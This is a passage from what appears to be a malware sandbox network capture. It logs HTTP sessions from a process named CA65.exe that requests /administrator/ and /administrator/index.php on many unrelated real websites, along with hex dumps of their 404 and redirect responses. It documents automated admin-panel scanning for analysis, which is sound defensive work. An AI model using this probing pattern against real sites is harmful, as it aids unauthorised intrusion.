Dec 22, 2023 21:14:51.239665031 CET	1286	IN	Data Raw: 31 39 62 61 0d 0a 3c 64 69 76 20 69 64 3d 22 74 65 78 74 2d 32 22 20 63 6c 61 73 73 3d 22 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 20 77 69 64 67 65 74 5f 74 65 78 74 22 3e 3c 68 34 20 63 6c 61 73 73 3d 22 77 69 64 67 65 74 2d 74 69 74 6c Data Ascii: 19ba<div id="text-2" class="widget-container widget_text"><h4 class="widget-title">Phone</h4><div class="textwidget"><p>405-235-1900</p></div></div><div id="text-3" class="widget-container widget_text"><h4 class="widget-title">Fax</h4
Dec 22, 2023 21:14:51.239715099 CET	1286	IN	Data Raw: 65 74 2d 32 22 20 63 6c 61 73 73 3d 22 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 20 57 50 5f 45 64 69 74 6f 72 5f 57 69 64 67 65 74 22 3e 3c 68 36 3e 54 45 52 4d 53 20 4f 46 20 55 53 45 3c 2f 68 36 3e 0a 3c 68 36 3e 3c 73 74 72 6f 6e 67 3e Data Ascii: et-2" class="widget-container WP_Editor_Widget"><h6>TERMS OF USE</h6><h6><strong>LEGAL NOTICE AND DISCLAIMER.</strong></h6><p>The material on our web site is for informational purposes only and do not constitute advertising, a solicitation o
Dec 22, 2023 21:14:51.239866972 CET	1286	IN	Data Raw: 73 74 2f 76 65 6e 64 6f 72 2f 6c 6f 64 61 73 68 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 34 2e 31 37 2e 32 31 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 0a 77 69 6e Data Ascii: st/vendor/lodash.min.js?ver=4.17.21'></script><script type='text/javascript'>window.lodash = _.noConflict();</script><script type='text/javascript' src='http://derrickandbriggs.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=7.4.4'><
Dec 22, 2023 21:14:51.240005970 CET	1286	IN	Data Raw: 70 3a 2f 2f 64 65 72 72 69 63 6b 61 6e 64 62 72 69 67 67 73 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 76 65 6e 64 6f 72 2f 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 65 6c 65 6d 65 6e 74 2d 63 6c 6f 73 65 73 74 2e 6d 69 Data Ascii: p://derrickandbriggs.com/wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js?ver=2.0.2"></scr' + 'ipt>' );</script><script type='text/javascript' src='http://derrickandbriggs.com/wp-includes/js/dist/vendor/react.min.js?ver=16.9.0'>
Dec 22, 2023 21:14:51.244118929 CET	246	OUT	GET /administrator/index.php HTTP/1.1 Host: derrickandbriggs.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://derrickandbriggs.com/administrator/
Dec 22, 2023 21:14:51.534945965 CET	368	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:51 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://derrickandbriggs.com/administrator/ Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8
Dec 22, 2023 21:14:51.674717903 CET	237	OUT	GET /administrator/ HTTP/1.1 Host: derrickandbriggs.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://derrickandbriggs.com/administrator/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	55122	15.197.142.173	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:50.911988020 CET	183	OUT	GET /administrator/ HTTP/1.1 Host: smartiebritches.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Dec 22, 2023 21:14:51.067002058 CET	365	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:50 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-122-137.ec2.internal X-Request-Id: 3c744ec0-7d37-45f1-9715-6f2f8f433e61 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Dec 22, 2023 21:14:51.067919016 CET	244	OUT	GET /administrator/index.php HTTP/1.1 Host: smartiebritches.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://smartiebritches.com/administrator/
Dec 22, 2023 21:14:51.227106094 CET	365	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-122-234.ec2.internal X-Request-Id: 805ce8b9-08e2-4e8c-83e1-17b6ee35516e Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	55072	68.178.145.3	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.020414114 CET	177	OUT	GET /administrator/ HTTP/1.1 Host: ismaworld.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Dec 22, 2023 21:14:51.400811911 CET	441	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:51 GMT Server: Apache Location: http://ismaworld.com/administrator Content-Length: 242 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://ismaworld.com/administrator">here</a>.</p></body></html>
Dec 22, 2023 21:14:51.401181936 CET	176	OUT	GET /administrator HTTP/1.1 Host: ismaworld.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Dec 22, 2023 21:14:51.803222895 CET	1286	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:51 GMT Server: Apache X-Powered-By: PHP/8.1.26 Cache-Control: no-cache, private Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 39 34 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 74 6d 6c 0d 0a 20 20 20 20 6c 61 6e 67 3d 22 65 6e 20 22 0d 0a 20 20 20 20 64 61 74 61 2d 74 65 78 74 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 0d 0a 20 20 20 20 63 6c 61 73 73 3d 22 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 49 73 6d 61 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 63 73 73 2f 63 75 73 74 6f 6d 2f 6c 6f 61 64 65 72 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 6a 73 2f 63 6f 72 65 2f 73 63 72 69 70 74 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 76 65 6e 64 6f 72 73 2f 63 73 73 2f 76 65 6e 64 6f 72 73 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 76 65 6e 64 6f 72 73 2f 63 73 73 2f 75 69 2f 70 72 69 73 6d 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 76 65 6e 64 6f 72 73 2f 63 73 73 2f 65 78 74 65 6e 73 69 6f 6e 73 2f 73 77 65 65 74 61 6c 65 72 74 32 2e 6d 69 6e 2e 63 73 73 22 3e 0d 0a 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 76 65 6e 64 6f 72 73 2f 63 73 73 2f 65 78 74 65 6e 73 69 6f 6e 73 2f 74 6f 61 73 74 72 2e 6d 69 6e 2e 63 73 73 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 76 65 6e 64 6f 72 73 2f 63 73 73 2f 66 6f 72 6d 73 2f 73 65 6c 65 63 74 2f 73 65 6c 65 63 74 32 2e 6d 69 6e 2e Data Ascii: 1942<!DOCTYPE html><html lang="en " data-textdirection="ltr" class=""><head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,initial-scale=1.0"> <meta name="csrf-token" content=""> <title>Error 404 - Isma</title> <link rel="shortcut icon" type="image/x-icon" href="http://ismaworld.com/images/logo/favicon.ico"> <link rel="stylesheet" href="http://ismaworld.com/css/custom/loader.css" /> <script src="http://ismaworld.com/js/core/scripts.js"></script> <link rel="stylesheet" href="http://ismaworld.com/vendors/css/vendors.min.css" /><link rel="stylesheet" href="http://ismaworld.com/vendors/css/ui/prism.min.css" /><link rel="stylesheet" href="http://ismaworld.com/vendors/css/extensions/sweetalert2.min.css"><link rel="stylesheet" href="http://ismaworld.com/vendors/css/extensions/toastr.min.css"><link rel="stylesheet" href="http://ismaworld.com/vendors/css/forms/select/select2.min.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	55472	104.21.69.169	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.182102919 CET	173	OUT	GET /administrator/ HTTP/1.1 Host: aikya.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Dec 22, 2023 21:14:51.468866110 CET	810	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: http://www.aikya.org/administrator/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TJIsiBY%2BBqQsHNaTe%2BGuGvFoHSINmOgub%2BoW5IXpQtyjPLT9tGcoL%2BlrHfIrqbDiOmN6%2BoV6KX4skLKNRNEOy2p4V%2F8IZnLMgFK3cNp6gVmlJ3mUrZ5%2F4p7So10%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08924d857498-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 62 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Dec 22, 2023 21:14:51.468898058 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	55073	15.197.142.173	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.234174967 CET	178	OUT	GET /administrator/ HTTP/1.1 Host: kegerators.net Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Dec 22, 2023 21:14:51.386948109 CET	365	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-123-165.ec2.internal X-Request-Id: 3afde26e-14a5-4db6-b41e-bc49882a39f5 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Dec 22, 2023 21:14:51.387567997 CET	234	OUT	GET /administrator/index.php HTTP/1.1 Host: kegerators.net Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://kegerators.net/administrator/
Dec 22, 2023 21:14:51.544924974 CET	365	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-122-104.ec2.internal X-Request-Id: 9bfc2e0a-1d01-4838-89f0-a4c47bc5bbb0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	55069	185.230.63.107	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:51.234414101 CET	177	OUT	GET /administrator/ HTTP/1.1 Host: pmcsystem.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Dec 22, 2023 21:14:51.411348104 CET	1280	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive x-wix-request-id: 1703276091.3121709925280112277 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLsrnLBntwLRXccxrbxQ/m1sa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalnZCKOJV3ikusuy8uWMJmMugTMZw2nlpXujg3R2m5DXfsTf0Hk8TJ3ijVqdUOr14xg==,2UNV7KOq4oGjA5+PKsX47Ad3BAkeAb9lWxcyN70+/DFYgeUJqUXtid+86vZww+nL,S+3YDkrdjZ6isF/aTRkOdUjmz5YjnwZx7K9uZU5HfPQ=,c2NmS8zFFiMMSZsKYWKS96LADve3hkb6YcfzdP1unZI=,WDMzHiyOL7uW518fW2ByrxYm7Hy0IxbPwWPdSZ00JGIuGGyTjOJT2bBDFj9QbaUIfL/RERtnkwYNR6ehP9dODg== Vary: Accept-Encoding X-Content-Type-Options: nosniff Content-Encoding: gzip Transfer-Encoding: chunked Data Raw: 34 32 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 df 6f db 36 10 7e cf 5f c1 e8 45 2d 10 8a 71 d6 61 69 26 05 e8 b2 0c cb cb 30 6c 28 b0 a1 28 0a 5a 3c 5b 4c 28 52 25 29 ff 40 d7 ff 7d 77 94 ec 39 71 b0 c6 89 1f 6c f3 c8 bb fb be bb 23 ef 18 2b 8f 39 67 8c f3 cb a3 a3 f2 58 b9 3a ae 3b 60 4d 6c cd 25 ae 39 3f 62 f8 a1 dd 92 64 cc ce b9 ec ba 2a 5b ea d5 b5 f7 ce ff 2e e7 10 de 75 5d 46 07 40 aa 4b 3c 5f b6 10 25 b3 b2 85 2a 5b 68 58 76 ce c7 8c d5 ce 46 b0 91 54 55 6c 2a 05 0b 5d 03 4f 8b 13 6d 75 d4 d2 f0 50 4b 03 d5 e4 84 b5 72 a5 db be fd 4f d0 07 f0 69 25 a7 78 c2 3a f4 b7 71 54 37 d2 07 40 c3 7d 9c f1 f3 9d 8d 26 c6 8e c3 e7 5e 2f aa ec 2f fe fe 1d bf 72 6d 27 a3 46 0b 3b 70 6e ae 2b 50 73 18 f4 a2 8e 06 88 e4 54 5b 55 65 79 87 f4 3e 25 61 ce fe 61 d1 4b 1b 8c 8c 78 b8 14 49 fa 90 ae 82 50 7b dd 45 ed ec 8e 8b 1d 4c 07 44 65 4f cb bb a9 8b 61 c7 ae 75 88 12 56 27 cc ba 99 33 c6 2d 07 95 6d 42 29 75 a5 d1 f6 8e 51 52 ab 4c b7 48 47 74 76 9e b1 c6 c3 ac ca 84 58 2e 97 05 e6 b2 a8 5d 2b 66 12 53 e2 6c 81 5f 19 f3 60 aa 2c 34 98 ba ba 8f 8c e4 7b c6 07 d3 1b 4b 21 62 68 eb a2 93 5e 86 e8 3c 7a 4a 46 31 6f 94 e8 20 62 a3 bd e2 b8 1d d7 62 86 b5 10 c4 af 60 16 80 3a 32 ad 7f 91 35 6a 04 e4 37 b8 8e 6b 03 a1 01 c0 d2 19 d0 47 58 45 91 0e 88 14 f6 1d 9a 03 92 3d bd a7 42 c3 00 f0 ae 9f 1a 5d 8b 49 f1 c3 e4 6d 71 2a 42 72 2f 80 6a 1c 41 63 91 8f a2 04 f1 be ff 52 0c 95 5f 4e 9d 5a 33 23 Data Ascii: 427Vo6~_E-qai&0l((Z<[L(R%)@}w9ql#+9gX:;`Ml%9?bd[.u]F@K<_%[hXvFTUl]OmuPKrOi%x:qT7@}&^//rm'F;pn+PsT[Uey>%aaKxIP{ELDeOauV'3-mB)uQRLHGtvX.]+fSl_`,4{K!bh^<zJF1o bb`:25j7kGXE=B]ImqBr/jAcR_NZ3#
Dec 22, 2023 21:14:51.411391973 CET	606	IN	Data Raw: ed bc ca 00 f3 8f 65 44 45 ef 31 35 e0 ab 6c 7b 5f ae b6 42 26 03 4b 2e e8 1a 5d 45 6f 30 b9 46 86 80 fa 5b c7 74 df 06 5b c3 ce 97 3c 00 9a 55 d2 af f9 54 d6 77 73 ef 7a ab f2 0b a6 c3 9f 9b 8d 9f b6 f2 af 88 95 22 f5 41 cf 98 89 ec e6 9a bd fd Data Ascii: eDE15l{_B&K.]Eo0F[t[<UTwsz"AJY5!=nY18mEmq)`{btHA2a4=5rZlczF^#19>8-?H^P,HYqv.F#w)'vG'F:oOs1\|h
Dec 22, 2023 21:14:51.412357092 CET	232	OUT	GET /administrator/index.php HTTP/1.1 Host: pmcsystem.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://pmcsystem.com/administrator/
Dec 22, 2023 21:14:51.584842920 CET	1280	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:51 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive x-wix-request-id: 1703276091.4901709925280212277 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLsrnLBntwLRXccxrbxQ/m1sa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalpGMksnd3IwBAt8vQj5PWppYzrBY4ZCZ7qfk0aaye0TuqG9EI0zcyI4825B9mshKCg==,2UNV7KOq4oGjA5+PKsX47HWShCS4DzdxDWECJm/3qSgfbJaKSXYQ/lskq2jK6SGP,S+3YDkrdjZ6isF/aTRkOdUjmz5YjnwZx7K9uZU5HfPQ=,q4Lmhk3LuY9WzSLOm0WLKV0xpIl3PUTIhAv9hKeMcO0=,WDMzHiyOL7uW518fW2Byr06xHPCK537k6EVzpMSs4DH99KqBTwExals4cOXLszKDtqhJvaMlJuqJm4JppQlSfA== Vary: Accept-Encoding X-Content-Type-Options: nosniff Content-Encoding: gzip Transfer-Encoding: chunked Data Raw: 34 32 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 df 6f db 36 10 7e cf 5f c1 e8 45 2d 10 8a 71 d6 61 69 26 05 e8 b2 0c cb cb 30 6c 28 b0 a1 28 0a 5a 3c 5b 4c 28 52 25 29 ff 40 d7 ff 7d 77 94 ec 39 71 b0 c6 89 1f 6c f3 c8 bb fb be bb 23 ef 18 2b 8f 39 67 8c f3 cb a3 a3 f2 58 b9 3a ae 3b 60 4d 6c cd 25 ae 39 3f 62 f8 a1 dd 92 64 cc ce b9 ec ba 2a 5b ea d5 b5 f7 ce ff 2e e7 10 de 75 5d 46 07 40 aa 4b 3c 5f b6 10 25 b3 b2 85 2a 5b 68 58 76 ce c7 8c d5 ce 46 b0 91 54 55 6c 2a 05 0b 5d 03 4f 8b 13 6d 75 d4 d2 f0 50 4b 03 d5 e4 84 b5 72 a5 db be fd 4f d0 07 f0 69 25 a7 78 c2 3a f4 b7 71 54 37 d2 07 40 c3 7d 9c f1 f3 9d 8d 26 c6 8e c3 e7 5e 2f aa ec 2f fe fe 1d bf 72 6d 27 a3 46 0b 3b 70 6e ae 2b 50 73 18 f4 a2 8e 06 88 e4 54 5b 55 65 79 87 f4 3e 25 61 ce fe 61 d1 4b 1b 8c 8c 78 b8 14 49 fa 90 ae 82 50 7b dd 45 ed ec 8e 8b 1d 4c 07 44 65 4f cb bb a9 8b 61 c7 ae 75 88 12 56 27 cc ba 99 33 c6 2d 07 95 6d 42 29 75 a5 d1 f6 8e 51 52 ab 4c b7 48 47 74 76 9e b1 c6 c3 ac ca 84 58 2e 97 05 e6 b2 a8 5d 2b 66 12 53 e2 6c 81 5f 19 f3 60 aa 2c 34 98 ba ba 8f 8c e4 7b c6 07 d3 1b 4b 21 62 68 eb a2 93 5e 86 e8 3c 7a 4a 46 31 6f 94 e8 20 62 a3 bd e2 b8 1d d7 62 86 b5 10 c4 af 60 16 80 3a 32 ad 7f 91 35 6a 04 e4 37 b8 8e 6b 03 a1 01 c0 d2 19 d0 47 58 45 91 0e 88 14 f6 1d 9a 03 92 3d bd a7 42 c3 00 f0 ae 9f 1a 5d 8b 49 f1 c3 e4 6d 71 2a 42 72 2f 80 6a 1c 41 63 91 8f a2 04 f1 be ff 52 0c 95 5f 4e 9d 5a 33 23 Data Ascii: 